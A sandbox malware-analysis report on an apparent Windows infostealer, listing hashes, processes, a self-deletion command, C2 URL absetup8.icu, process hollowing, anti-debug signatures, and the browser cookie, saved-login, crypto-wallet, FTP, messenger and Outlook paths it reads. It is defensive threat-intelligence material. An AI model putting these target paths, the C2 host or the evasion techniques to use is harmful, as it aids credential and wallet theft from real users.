1
2* ID: 784
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_3def155b4c3c49e69e2f76499de14034.exe"
8* File Size: 540672
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "db6309a594ea596569a878d8a692b83abe35aa33b2c2b39aa81615005c0d30ac"
11* MD5: "3def155b4c3c49e69e2f76499de14034"
12* SHA1: "72a9f61dcdbf43e2cb40f5fe171008c2aa70cc63"
13* SHA512: "28c221ebe2899034a902584eed7fb08b4341011c1e5cced3dc771451a95032807d1a49aac2ff259f4f97eed26d58767736387ff1a6a3c91b4699561e965f4ed8"
14* CRC32: "2C4801B7"
15* SSDEEP: "6144:SsJcPyFZfh/EkIafaUEl8GEnwwcTRvpM9/5V2MYfG6jqoHTshzjJ3gFKxrNVt3gr:SMLZ/gNdl8CB0WMYfPO1TrXtB"
16
17* Process Execution:
18 "fo1GrAw0yY7y3v.exe",
19 "fo1GrAw0yY7y3v.exe",
20 "cmd.exe",
21 "timeout.exe",
22 "services.exe",
23 "lsass.exe",
24 "WmiApSrv.exe",
25 "svchost.exe",
26 "svchost.exe",
27 "WMIADAP.exe",
28 "WmiPrvSE.exe"
29
30
31* Executed Commands:
32 "\"C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe\"",
33 "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
34 "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
35 "C:\\Windows\\system32\\lsass.exe",
36 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
37 "C:\\Windows\\system32\\svchost.exe -k netsvcs",
38 "C:\\Windows\\system32\\timeout.exe 3"
39
40
41* Signatures Detected:
42
43 "Description": "Behavioural detection: Executable code extraction",
44 "Details":
45
46
47 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
48 "Details":
49
50
51 "Description": "Possible date expiration check, exits too soon after checking local time",
52 "Details":
53
54 "process": "fo1GrAw0yY7y3v.exe, PID 2200"
55
56
57
58
59 "Description": "Anomalous file deletion behavior detected (10+)",
60 "Details":
61
62 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp"
63
64
65 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp"
66
67
68 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp"
69
70
71 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp"
72
73
74 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp"
75
76
77 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
78
79
80 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
81
82
83 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
84
85
86 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
87
88
89 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
90
91
92 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
93
94
95 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
96
97
98 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
99
100
101 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
102
103
104 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
105
106
107 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
108
109
110 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
111
112
113 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
114
115
116 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
117
118
119 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
120
121
122 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
123
124
125 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
126
127
128 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
129
130
131 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
132
133
134 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
135
136
137 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
138
139
140 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
141
142
143 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
144
145
146 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
147
148
149 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
150
151
152 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
153
154
155 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
156
157
158 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
159
160
161 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
162
163
164 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
165
166
167 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
168
169
170 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
171
172
173 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
174
175
176 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
177
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
180
181
182 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
183
184
185 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
186
187
188 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
189
190
191 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
192
193
194 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
195
196
197 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
198
199
200 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
201
202
203 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
204
205
206 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
207
208
209 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
210
211
212 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
213
214
215 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
216
217
218 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
219
220
221 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
222
223
224 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
225
226
227 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
228
229
230
231
232 "Description": "Guard pages use detected - possible anti-debugging.",
233 "Details":
234
235
236 "Description": "Performs HTTP requests potentially not found in PCAP.",
237 "Details":
238
239 "url_ioc": "absetup8.icu:80//index.php"
240
241
242 "url_ioc": "absetup8.icu:80//index.php"
243
244
245
246
247 "Description": "A process created a hidden window",
248 "Details":
249
250 "Process": "fo1GrAw0yY7y3v.exe -> C:\\Windows\\System32\\cmd.exe"
251
252
253
254
255 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
256 "Details":
257
258 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
259
260
261 "suspicious_request_iocs": "http://absetup8.icu/index.php"
262
263
264
265
266 "Description": "Performs some HTTP requests",
267 "Details":
268
269 "url_iocs": "http://absetup8.icu/index.php"
270
271
272
273
274 "Description": "Uses Windows utilities for basic functionality",
275 "Details":
276
277 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
278
279
280 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
281
282
283
284
285 "Description": "Behavioural detection: Injection (Process Hollowing)",
286 "Details":
287
288 "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
289
290
291
292
293 "Description": "Executed a process and injected code into it, probably while unpacking",
294 "Details":
295
296 "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
297
298
299
300
301 "Description": "Deletes its original binary from disk",
302 "Details":
303
304
305 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
306 "Details":
307
308 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 1896668 times"
309
310
311
312
313 "Description": "Steals private information from local Internet browsers",
314 "Details":
315
316 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
317
318
319 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
320
321
322 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
323
324
325 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
326
327
328 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
329
330
331 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
332
333
334 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
335
336
337 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
338
339
340 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
341
342
343 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
344
345
346 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
347
348
349 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
350
351
352 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
353
354
355 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
356
357
358 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
359
360
361 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
362
363
364 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
365
366
367 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
368
369
370 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
371
372
373 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
374
375
376
377
378 "Description": "Collects information about installed applications",
379 "Details":
380
381 "Program": "Google Update Helper"
382
383
384
385
386 "Program": "Microsoft Excel MUI 2013"
387
388
389 "Program": "Microsoft Outlook MUI 2013"
390
391
392
393
394 "Program": "Google Chrome"
395
396
397 "Program": "Adobe Flash Player 29 NPAPI"
398
399
400 "Program": "Adobe Flash Player 29 ActiveX"
401
402
403 "Program": "Microsoft DCF MUI 2013"
404
405
406 "Program": "Microsoft Access MUI 2013"
407
408
409 "Program": "Microsoft Office Proofing Tools 2013 - English"
410
411
412 "Program": "Adobe Acrobat Reader DC"
413
414
415 "Program": "Microsoft Publisher MUI 2013"
416
417
418 "Program": "Microsoft Office Shared MUI 2013"
419
420
421 "Program": "Microsoft Office OSM MUI 2013"
422
423
424 "Program": "Microsoft InfoPath MUI 2013"
425
426
427 "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
428
429
430 "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
431
432
433 "Program": "Microsoft Word MUI 2013"
434
435
436 "Program": "Microsoft OneDrive"
437
438
439 "Program": "Microsoft Groove MUI 2013"
440
441
442 "Program": "Microsoft Office Proofing Tools 2013 - Español"
443
444
445
446
447 "Program": "Microsoft Access Setup Metadata MUI 2013"
448
449
450 "Program": "Microsoft Office OSM UX MUI 2013"
451
452
453 "Program": "Java Auto Updater"
454
455
456 "Program": "Microsoft PowerPoint MUI 2013"
457
458
459 "Program": "Microsoft Office Professional Plus 2013"
460
461
462 "Program": "Adobe Refresh Manager"
463
464
465 "Program": "Microsoft Office Proofing 2013"
466
467
468 "Program": "Microsoft Lync MUI 2013"
469
470
471
472
473 "Program": "Microsoft OneNote MUI 2013"
474
475
476
477
478 "Description": "Stack pivoting was detected when using a critical API",
479 "Details":
480
481 "process": "svchost.exe:700"
482
483
484
485
486 "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
487 "Details":
488
489 "FireEye": "Generic.mg.3def155b4c3c49e6"
490
491
492 "McAfee": "Packed-FVG!3DEF155B4C3C"
493
494
495 "CrowdStrike": "win/malicious_confidence_90% (W)"
496
497
498 "Invincea": "heuristic"
499
500
501 "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
502
503
504 "APEX": "Malicious"
505
506
507 "Kaspersky": "UDS:DangerousObject.Multi.Generic"
508
509
510 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.hh"
511
512
513 "Trapmine": "suspicious.low.ml.score"
514
515
516 "SentinelOne": "DFI - Suspicious PE"
517
518
519 "Endgame": "malicious (high confidence)"
520
521
522 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
523
524
525 "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
526
527
528 "Acronis": "suspicious"
529
530
531 "Cylance": "Unsafe"
532
533
534 "Cybereason": "malicious.dcdbf4"
535
536
537 "Qihoo-360": "HEUR/QVM03.0.A059.Malware.Gen"
538
539
540
541
542 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
543 "Details":
544
545
546 "Description": "Attempts to access Bitcoin/ALTCoin wallets",
547 "Details":
548
549 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
550
551
552 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
553
554
555 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
556
557
558 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
559
560
561 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
562
563
564 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
565
566
567 "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
568
569
570 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
571
572
573 "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
574
575
576 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
577
578
579 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
580
581
582 "file": "C:\\Users\\user\\AppData\\wallet.dat"
583
584
585 "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
586
587
588 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
589
590
591 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
592
593
594 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
595
596
597 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
598
599
600
601
602 "Description": "Harvests credentials from local FTP client software",
603 "Details":
604
605 "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
606
607
608
609
610 "Description": "Harvests information related to installed instant messenger clients",
611 "Details":
612
613 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
614
615
616
617
618 "Description": "Harvests information related to installed mail clients",
619 "Details":
620
621 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
622
623
624 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
625
626
627 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
628
629
630 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
631
632
633 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
634
635
636 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
637
638
639 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
640
641
642 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
643
644
645 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
646
647
648 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
649
650
651 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
652
653
654 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
655
656
657 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
658
659
660 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
661
662
663 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
664
665
666 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
667
668
669 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
670
671
672 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
673
674
675 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
676
677
678 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
679
680
681 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
682
683
684
685
686 "Description": "Collects information to fingerprint the system",
687 "Details":
688
689
690 "Description": "Uses suspicious command line tools or Windows utilities",
691 "Details":
692
693 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
694
695
696 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
697
698
699
700
701
702* Started Service:
703 "VaultSvc",
704 "wmiApSrv"
705
706
707* Mutexes:
708 "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
709 "Global\\RefreshRA_Mutex_Lib",
710 "Global\\RefreshRA_Mutex",
711 "Global\\RefreshRA_Mutex_Flag",
712 "Global\\WmiApSrv",
713 "Global\\ADAP_WMI_ENTRY"
714
715
716* Modified Files:
717 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
718 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
719 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
720 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
721 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
722 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
723 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
724 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
725 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
726 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
727 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
728 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
729 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
730 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
731 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
732 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
733 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
734 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
735 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
736 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
737 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
738 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
739 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
740 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
741 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
742 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
743 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
744 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
745 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
746 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
747 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
748 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
749 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
750 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
751 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
752 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
753 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
754 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
755 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
756 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
757 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
758 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
759 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
760 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
761 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
762 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
763 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
764 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
765 "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
766 "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
767 "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
768 "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
769 "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
770 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
771 "\\??\\WMIDataDevice",
772 "\\??\\PIPE\\samr",
773 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
774 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
775 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
776 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
